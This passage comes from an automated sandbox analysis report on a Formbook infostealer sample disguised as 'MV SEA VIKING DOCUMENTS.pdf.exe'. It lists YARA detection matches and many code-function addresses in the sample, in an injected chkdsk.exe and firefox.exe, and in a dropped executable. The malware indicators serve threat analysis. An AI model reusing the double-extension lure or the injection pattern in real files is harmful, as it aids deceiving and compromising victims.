      Source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Initial sample is a PE file and has a suspicious name
      Source: initial sampleStatic PE information: Filename: MV SEA VIKING DOCUMENTS.pdf.exe
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0040755C0_2_0040755C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_00406D850_2_00406D85
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_71491BFF0_2_71491BFF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245B2A60_2_0245B2A6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245FC110_2_0245FC11
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_02458E5A0_2_02458E5A
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_02452FC10_2_02452FC1
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_02458BDC0_2_02458BDC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245300A0_2_0245300A
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245754E0_2_0245754E
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245F5CB0_2_0245F5CB
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1ECF0013_2_1F1ECF00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F29FF6313_2_1F29FF63
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F29EFBF13_2_1F29EFBF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F291FC613_2_1F291FC6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F222E4813_2_1F222E48
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F200E5013_2_1F200E50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F290EAD13_2_1F290EAD
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB213_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D2EE813_2_1F1D2EE8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F299ED213_2_1F299ED2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A1D2E13_2_1F2A1D2E
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DAD0013_2_1F1DAD00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F297D4C13_2_1F297D4C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0D6913_2_1F1E0D69
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1F2DB013_2_1F1F2DB0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E9DD013_2_1F1E9DD0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F27FDF413_2_1F27FDF4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D0C1213_2_1F1D0C12
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EAC2013_2_1F1EAC20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F296C6913_2_1F296C69
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F29EC6013_2_1F29EC60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28EC4C13_2_1F28EC4C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C6013_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F279C9813_2_1F279C98
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1F8CDF13_2_1F1F8CDF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2AACEB13_2_1F2AACEB
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F267CE813_2_1F267CE8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E8CE013_2_1F1E8CE0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FFCE013_2_1F1FFCE0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0B1013_2_1F1E0B10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F21DB1913_2_1F21DB19
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F254BC013_2_1F254BC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F29CA1313_2_1F29CA13
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F29EA5B13_2_1F29EA5B
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F29FA8913_2_1F29FA89
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FFAA013_2_1F1FFAA0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F29E9A613_2_1F29E9A6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DE9A013_2_1F1DE9A0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2259C013_2_1F2259C0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1A99E813_2_1F1A99E8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28083513_2_1F280835
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E380013_2_1F1E3800
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20E81013_2_1F20E810
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F25587013_2_1F255870
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E987013_2_1F1E9870
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FB87013_2_1F1FB870
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C686813_2_1F1C6868
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2598B213_2_1F2598B2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1F688213_2_1F1F6882
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E58B013_2_1F1E58B0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2978F313_2_1F2978F3
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E28C013_2_1F1E28C0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2918DA13_2_1F2918DA
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D170C13_2_1F1D170C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1A170713_2_1F1A1707
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EA76013_2_1F1EA760
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F29675713_2_1F296757
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F27D62C13_2_1F27D62C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FC60013_2_1F1FC600
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20467013_2_1F204670
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28D64613_2_1F28D646
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2536EC13_2_1F2536EC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F29F6F613_2_1F29F6F6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DC6E013_2_1F1DC6E0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2AA52613_2_1F2AA526
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F29F5C913_2_1F29F5C9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2975C613_2_1F2975C6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E044513_2_1F1E0445
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24D48013_2_1F24D480
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EE31013_2_1F1EE310
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F29F33013_2_1F29F330
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D138013_2_1F1D1380
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FD21013_2_1F1FD210
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1A224513_2_1F1A2245
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F29124C13_2_1F29124C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CD2EC13_2_1F1CD2EC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CF11313_2_1F1CF113
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F27D13013_2_1F27D130
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A010E13_2_1F2A010E
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F22717A13_2_1F22717A
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FB1E013_2_1F1FB1E0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28E07613_2_1F28E076
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F21508C13_2_1F21508C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D00A013_2_1F1D00A0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EB0D013_2_1F1EB0D0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2970F113_2_1F2970F1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054FA52621_2_054FA526
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054EF5C921_2_054EF5C9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054E75C621_2_054E75C6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0543044521_2_05430445
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0549D48021_2_0549D480
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054E675721_2_054E6757
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0543A76021_2_0543A760
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0542170C21_2_0542170C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054DD64621_2_054DD646
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0545467021_2_05454670
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0544C60021_2_0544C600
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054CD62C21_2_054CD62C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0542C6E021_2_0542C6E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054A36EC21_2_054A36EC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054EF6F621_2_054EF6F6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0547717A21_2_0547717A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054F010E21_2_054F010E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0541F11321_2_0541F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054CD13021_2_054CD130
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0544B1E021_2_0544B1E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054DE07621_2_054DE076
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0543B0D021_2_0543B0D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054E70F121_2_054E70F1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0546508C21_2_0546508C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054200A021_2_054200A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0543E31021_2_0543E310
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054EF33021_2_054EF330
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0542138021_2_05421380
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054E124C21_2_054E124C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0544D21021_2_0544D210
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_053F224521_2_053F2245
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0541D2EC21_2_0541D2EC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054E7D4C21_2_054E7D4C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05430D6921_2_05430D69
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0542AD0021_2_0542AD00
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054F1D2E21_2_054F1D2E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05439DD021_2_05439DD0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054CFDF421_2_054CFDF4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05442DB021_2_05442DB0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054DEC4C21_2_054DEC4C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05433C6021_2_05433C60
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054E6C6921_2_054E6C69
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054EEC6021_2_054EEC60
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05420C1221_2_05420C12
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0543AC2021_2_0543AC20
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05448CDF21_2_05448CDF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05438CE021_2_05438CE0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054B7CE821_2_054B7CE8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054FACEB21_2_054FACEB
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0544FCE021_2_0544FCE0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C9C9821_2_054C9C98
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054EFF6321_2_054EFF63
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0543CF0021_2_0543CF00
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054E1FC621_2_054E1FC6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054EEFBF21_2_054EEFBF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05472E4821_2_05472E48
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05450E5021_2_05450E50
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054D0E6D21_2_054D0E6D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054E9ED221_2_054E9ED2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05422EE821_2_05422EE8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054E0EAD21_2_054E0EAD
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05431EB221_2_05431EB2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054759C021_2_054759C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_053F99E821_2_053F99E8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0542E9A021_2_0542E9A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054EE9A621_2_054EE9A6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0541686821_2_05416868
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0543987021_2_05439870
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0544B87021_2_0544B870
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054A587021_2_054A5870
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0543380021_2_05433800
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0545E81021_2_0545E810
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054D083521_2_054D0835
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054328C021_2_054328C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054E18DA21_2_054E18DA
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054E78F321_2_054E78F3
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0544688221_2_05446882
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054358B021_2_054358B0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054A98B221_2_054A98B2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05430B1021_2_05430B10
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0546DB1921_2_0546DB19
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054A4BC021_2_054A4BC0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054EEA5B21_2_054EEA5B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054ECA1321_2_054ECA13
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054EFA8921_2_054EFA89
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0544FAA021_2_0544FAA0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00878C8021_2_00878C80
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0088CC0C21_2_0088CC0C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00872D8721_2_00872D87
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00872D9021_2_00872D90
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00872FB021_2_00872FB0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 30_2_0040755C30_2_0040755C
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 30_2_00406D8530_2_00406D85
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 33_2_00000244A227AD0233_2_00000244A227AD02
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 33_2_00000244A22738FB33_2_00000244A22738FB
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 33_2_00000244A227390233_2_00000244A2273902
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 33_2_00000244A227630233_2_00000244A2276302
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 33_2_00000244A22762FF33_2_00000244A22762FF
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 33_2_00000244A2279F0633_2_00000244A2279F06
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 33_2_00000244A227435933_2_00000244A2274359
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 33_2_00000244A227436233_2_00000244A2274362
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 33_2_00000244A22787B233_2_00000244A22787B2
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 34_2_0040755C34_2_0040755C
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 34_2_00406D8534_2_00406D85
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1DCF0035_2_1F1DCF00
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F28FF6335_2_1F28FF63
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F28EFBF35_2_1F28EFBF
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F281FC635_2_1F281FC6
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F270E6D35_2_1F270E6D
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1F0E5035_2_1F1F0E50
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F212E4835_2_1F212E48
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F280EAD35_2_1F280EAD
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1D1EB235_2_1F1D1EB2
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1C2EE835_2_1F1C2EE8
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F289ED235_2_1F289ED2
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F291D2E35_2_1F291D2E
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1CAD0035_2_1F1CAD00
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F287D4C35_2_1F287D4C
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1D0D6935_2_1F1D0D69
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1E2DB035_2_1F1E2DB0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1D9DD035_2_1F1D9DD0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F26FDF435_2_1F26FDF4
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1C0C1235_2_1F1C0C12
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1DAC2035_2_1F1DAC20
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F286C6935_2_1F286C69
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F28EC6035_2_1F28EC60
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F27EC4C35_2_1F27EC4C
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1D3C6035_2_1F1D3C60
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F269C9835_2_1F269C98
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1E8CDF35_2_1F1E8CDF
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F29ACEB35_2_1F29ACEB
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F257CE835_2_1F257CE8
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1D8CE035_2_1F1D8CE0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1EFCE035_2_1F1EFCE0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1D0B1035_2_1F1D0B10
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F20DB1935_2_1F20DB19
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F244BC035_2_1F244BC0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F28CA1335_2_1F28CA13
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F28EA5B35_2_1F28EA5B
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F28FA8935_2_1F28FA89
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1EFAA035_2_1F1EFAA0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F28E9A635_2_1F28E9A6
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1CE9A035_2_1F1CE9A0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F2159C035_2_1F2159C0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1FE81035_2_1F1FE810
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F27083535_2_1F270835
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1D380035_2_1F1D3800
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F24587035_2_1F245870
